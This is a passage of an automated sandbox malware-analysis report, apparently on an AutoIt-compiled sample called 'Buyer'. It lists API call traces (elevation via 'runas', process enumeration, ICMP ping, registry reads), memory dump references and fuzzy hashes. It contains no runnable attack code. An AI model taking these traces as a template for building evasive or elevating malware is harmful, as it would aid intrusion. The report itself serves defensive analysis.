                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,01003204), ref: 00F82FCA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                    • String ID: runas
                                                                                                    • API String ID: 448630720-4000483414
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00FADAE6
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00FADAF4
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00FADB14
                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00FADBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3243318325-0
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00F83902), ref: 00FAE1BC
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FAE1CD
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FAE1DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 48322524-0
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 00F4DDA7
                                                                                                    • timeGetTime.WINMM ref: 00F4DFA7
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E0C8
                                                                                                    • TranslateMessage.USER32(?), ref: 00F4E11B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00F4E129
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4E13F
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F4E151
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F429EF
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00F42A19
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F42A2A
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00F42A47
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F42A57
                                                                                                    • LoadIconW.USER32(000000A9), ref: 00F42A6D
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F42A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00F806ED: CreateFileW.KERNEL32(00000000,00000000,?,00F80A57,?,?,00000000,?,00F80A57,00000000,0000000C), ref: 00F8070A
                                                                                                    • GetLastError.KERNEL32 ref: 00F80AC2
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80AC9
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00F80AD5
                                                                                                    • GetLastError.KERNEL32 ref: 00F80ADF
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80AE8
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F80B08
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F80C52
                                                                                                    • GetLastError.KERNEL32 ref: 00F80C84
                                                                                                    • __dosmaperr.LIBCMT ref: 00F80C8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F43DEF
                                                                                                      • Part of subcall function 00F43A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F43A97
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F43C01
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F839E6
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F83A27
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F83A69
                                                                                                    • _wcslen.LIBCMT ref: 00F83AD0
                                                                                                    • _wcslen.LIBCMT ref: 00F83ADF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: 317ae5f553243a23ddec799676eefe142ad1630129a523f3f637c13b148e330d
                                                                                                    • Instruction ID: 97d299e6fb8ae03c513f2f14e562f7be8ce76a902b5c07a32c6236dcf0c1e241
                                                                                                    • Opcode Fuzzy Hash: 317ae5f553243a23ddec799676eefe142ad1630129a523f3f637c13b148e330d
                                                                                                    • Instruction Fuzzy Hash: 4071BE715043019FC314EF65D8818ABBBE8FF84760F40442EF8809B2A5EF7E9A49DB52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F42876
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F42885
                                                                                                    • LoadIconW.USER32(00000063), ref: 00F4289B
                                                                                                    • LoadIconW.USER32(000000A4), ref: 00F428AD
                                                                                                    • LoadIconW.USER32(000000A2), ref: 00F428BF
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F428D7
                                                                                                    • RegisterClassExW.USER32(?), ref: 00F42928
                                                                                                      • Part of subcall function 00F429BC: GetSysColorBrush.USER32(0000000F), ref: 00F429EF
                                                                                                      • Part of subcall function 00F429BC: RegisterClassExW.USER32(00000030), ref: 00F42A19
                                                                                                      • Part of subcall function 00F429BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F42A2A
                                                                                                      • Part of subcall function 00F429BC: InitCommonControlsEx.COMCTL32(?), ref: 00F42A47
                                                                                                      • Part of subcall function 00F429BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F42A57
                                                                                                      • Part of subcall function 00F429BC: LoadIconW.USER32(000000A9), ref: 00F42A6D
                                                                                                      • Part of subcall function 00F429BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F42A7C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: 8247a8c44740b75040ffaccbae66f9a228e2738e2255d5026f2dc86ce13075f2
                                                                                                    • Instruction ID: 0a1d548cbb4d699201b00b0f541851f70c2bfb4715c13f42b17cc03a7de4aa27
                                                                                                    • Opcode Fuzzy Hash: 8247a8c44740b75040ffaccbae66f9a228e2738e2255d5026f2dc86ce13075f2
                                                                                                    • Instruction Fuzzy Hash: 81216F70E00318AFDB209FA5EC45B9DBFB5FB48B50F60806AF544A62A4D3BE0540DF90

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00FC0D43
                                                                                                    • inet_addr.WSOCK32(?), ref: 00FC0DA3
                                                                                                    • gethostbyname.WS2_32(?), ref: 00FC0DAF
                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00FC0DBD
                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC0E4D
                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC0E6C
                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00FC0F40
                                                                                                    • WSACleanup.WSOCK32 ref: 00FC0F46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                    • String ID: Ping
                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                    • Opcode ID: 87bd4f4c2f90f940d6144acec694adffb637df47b7312eeeea889caea64a2d27
                                                                                                    • Instruction ID: b40b2f1f7f8eb7156df938ab6765c4dae8fcf4244e01714d93b7cf34769079ba
                                                                                                    • Opcode Fuzzy Hash: 87bd4f4c2f90f940d6144acec694adffb637df47b7312eeeea889caea64a2d27
                                                                                                    • Instruction Fuzzy Hash: B7919271904202DFD720DF29C985F16BBE5EF44328F14899DF4698B6A2CB34ED46DB81

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F42F8C,?,?), ref: 00F42FFA
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00F42F8C,?,?), ref: 00F43026
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F43049
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F42F8C,?,?), ref: 00F43054
                                                                                                    • CreatePopupMenu.USER32 ref: 00F43068
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00F43089
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: TaskbarCreated
                                                                                                    • API String ID: 129472671-2362178303
                                                                                                    • Opcode ID: 3d0bd002004879e58f78c3d28c339b234fdbfd0ce38fcabda30ab96458abaa9b
                                                                                                    • Instruction ID: 92619dd7ed014875bef893b2fc97899edaf18a912cf2bd8e393ee12c2119f05b
                                                                                                    • Opcode Fuzzy Hash: 3d0bd002004879e58f78c3d28c339b234fdbfd0ce38fcabda30ab96458abaa9b
                                                                                                    • Instruction Fuzzy Hash: 51413732704144ABDB282B7CDC0DBB93F2AEB40368F54422AFD4286295DB7E9F45B351

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f88b3afe709533bdf28c6f246fcf8fa9ecc13d1630cd48b1b9b0d87f7d67d3f6
                                                                                                    • Instruction ID: 153d5c28ae023a7034300567f3bd050ad9c5b80b0a2a593a2decc1abc92b8dd6
                                                                                                    • Opcode Fuzzy Hash: f88b3afe709533bdf28c6f246fcf8fa9ecc13d1630cd48b1b9b0d87f7d67d3f6
                                                                                                    • Instruction Fuzzy Hash: 0DC10771D08249AFDF11DFACD881BAD7BB5BF09310F14814AE51CA7392C7B89941EB62

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                    • API String ID: 0-4285391669
                                                                                                    • Opcode ID: 8aaa9ffeb23b4c92a4244cfe9ac97c13741ff3422fe86db6fdaee93611d46269
                                                                                                    • Instruction ID: 9d0c8206c780732e8a263b7a9ff491300da878801c286e24e7e9e2b460524bf9
                                                                                                    • Opcode Fuzzy Hash: 8aaa9ffeb23b4c92a4244cfe9ac97c13741ff3422fe86db6fdaee93611d46269
                                                                                                    • Instruction Fuzzy Hash: A662AF70508341CFC728DF14C484AAABBE1FF89354F14891EE9998B352DB75D94AEF82

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F42979
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F4299A
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F41727,?), ref: 00F429AE
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F41727,?), ref: 00F429B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: 3db04b4123b65190aa009355d050643212868408692d0248a07fea10f0981b16
                                                                                                    • Instruction ID: 0a956f08479ca1a9c9315101482d8ebd25490c5aca9bc57c9b14290be88a0e71
                                                                                                    • Opcode Fuzzy Hash: 3db04b4123b65190aa009355d050643212868408692d0248a07fea10f0981b16
                                                                                                    • Instruction Fuzzy Hash: 15F0FEB16402947AEB3117276C08F373E7ED7CAF50F20805EB944A6264C56E1850EBB0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F842BC
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F45123
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                    • Opcode ID: 99574bb17110a36a5f10ae3c7fb2a5b181707a365740ffaee0973ae4e482614a
                                                                                                    • Instruction ID: 9a802c50d3ee568dbb40ea62fca61b9125ccb25b2dd0db2a6d84b9af9fcd4446
                                                                                                    • Opcode Fuzzy Hash: 99574bb17110a36a5f10ae3c7fb2a5b181707a365740ffaee0973ae4e482614a
                                                                                                    • Instruction Fuzzy Hash: F9419471808705ABC321FB60DC85BDF7BD89F85720F10491AF99992192EB38E649E793

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00F83391
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00F4318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F431A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X$pu$t
                                                                                                    • API String ID: 779396738-2539967330
                                                                                                    • Opcode ID: f28bba534ea5de1d8078a94d67aee9af9cdabe110ec9d3e1f287952bbb7c43f9
                                                                                                    • Instruction ID: da68d716a30b9e3b05c2cb9b0cae45df840c35a3e58653102fa1a5055a06d0b8
                                                                                                    • Opcode Fuzzy Hash: f28bba534ea5de1d8078a94d67aee9af9cdabe110ec9d3e1f287952bbb7c43f9
                                                                                                    • Instruction Fuzzy Hash: 5F218171A002889BDB05DF94DC45BEE7BF8AF48714F00401AE849E7281DBB95A49DB61

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F44698
                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F446B9
                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F446DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
